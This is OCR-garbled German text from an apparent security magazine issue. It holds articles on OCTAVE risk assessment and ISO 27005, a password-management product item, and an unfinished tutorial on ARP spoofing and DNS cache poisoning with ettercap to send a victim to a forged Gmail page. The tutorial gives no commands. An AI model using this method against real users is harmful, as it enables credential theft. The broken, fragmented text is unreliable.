Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
